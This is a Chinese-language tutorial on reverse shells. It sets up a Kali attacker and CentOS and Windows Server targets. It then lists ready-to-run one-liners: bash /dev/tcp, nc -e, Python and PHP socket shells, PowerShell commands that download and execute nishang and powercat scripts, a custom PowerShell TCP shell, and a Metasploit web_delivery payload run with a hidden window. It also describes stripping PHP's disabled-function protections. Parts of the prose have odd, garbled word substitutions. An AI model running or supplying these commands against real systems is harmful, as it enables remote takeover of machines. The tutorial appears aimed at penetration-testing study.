什么是Netcat?为什么选择Netcat?
Netcat由于他体积小且功能强大的特性,常常利用者被称为“瑞士军刀”或者ncat,在Debian、Mac系统中是默认安装的。想要在两台机器之间进行正向、反向连接,Netcat常日是不二之选,反弹shell的利用中常用参数包括:
-e filename 程序重定向-l 监听吸收信息-n 以数字形式表示的IP地址-p port 本地端口-u UDP模式-v 显示详细信息 (-vv能显示更加详细的)关于Netcatd的更多利用方法可参考:
https://www.freebuf.com/sectool/168661.html
Linux系统中常见的反弹shell
实验环境:
Kali:192.168.178.131
CentOS 7:192.168.178.218
方法一:利用Linux命令
#反弹命令:
bash -i >/dev/tcp/192.168.178.131/23333 0>&1 2>&1
在系统文件中是不存在/dev/tcp这个文件的,它是一个分外文件,打开这个文件就类似于发出了一个socket调用,建立一个socket连接,读写这个文件就相称于在这个socket连接中传输数据。同理/dev/udp便是通过udp来进行传输。
#Kali进行监听:
nc -lvp 23333
方法二:利用nc命令
#反弹命令:
nc -e /bin/bash 192.168.178.131 23333
(利用了nc的重定向功能)
#Kali进行监听:
nc -lvp 23333
方法三:利用脚本
1. Python
#反弹命令:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.178.131',23333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
#Kali进行监听:
nc -lvp 23333
2. php
(条件:须要在php.ini中放开危险函数system,exec。可以通过php --ini来查询php配置文件路径,然后删除配置文件中“disable_funtions”变量中对应的函数名即可。)
(1) 反弹命令(代码假设TCP连接的文件描述符为4,如果弗成可以换成5或6):
php -r '$sock=fsockopen("192.168.178.131",23333);system("/bin/bash -i <&4 >&4 2>&4");'
#Kali进行监听:
nc -lvp 23333
(2) 反弹命令:
php -r ‘exec(“/bin/bash -i >& /dev/tcp/192.168.178.131/23333”);’
#Kali进行监听:
nc -lvp 23333
Windows系统常见反弹命令
实验环境:
Kali:192.168.178.131
Windows server 2008:192.168.178.128
方法一:利用”nishang”攻击框架
Nishang(https://github.com/samratashok/nishang )是一个基于PowerShell的攻击框架,凑集了一些PowerShell攻击脚本和有效载荷,可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell。
1. 利用UDP反弹命令:
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 192.168.178.131 -port 23333
#Kali进行监听:
nc -lup 23333
2. 利用TCP反弹命令:
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.178.131 -port 23333
#Kali进行监听:
nc -lvp 23333
方法二:利用powercat
powercat(https://github.com/besimorhino/powercat)为Powershell版的Netcat,实际上是一个powershell的函数,利用方法类似Netcat。
#反弹命令:
powershell IEX (New-Object System.Net.Webclient).DownloadString ('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.178.131 -p 23333 -e cmd
#Kali进行监听:
nc -lvp 23333
方法三:自定义powershell函数
#反弹命令:
powershell -nop -c "$client = New-Object Net.Sockets.TCPClient('192.168.178.131',23333);$stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
#Kali进行监听:
nc -lvp 23333
方法四:利用metasploit
利用metasploit的web_delivery模块可通过python、php、powershell、regsvr32等进行反弹shell。
#以powershell进行反弹为例,kali实行命令,可以看到天生已经由编码的payload:
msfconsole
use exploit/multi/script/web_delivery
set payload windows/meterpreter/reverse_tcp
set target 2
set LPORT 23333
set LHOST 192.168.178.131
Set srvhost 0.0.0.0
Set srvpost 8080
run
#Win server 2008实行天生的命令“powershell.exe -nop -w hidden -e ......”(-w hidden参数义务令运行时窗口隐蔽)。
#Kali吸收到反弹:
以上提到的是常见的反弹shell办法,当然,还存在更多的其他办法,github上也有很多成熟的攻击框架可以实现反弹shell,例如PowerSploit、Empire、Dnscat等等,感兴趣可以连续进行深入学习。
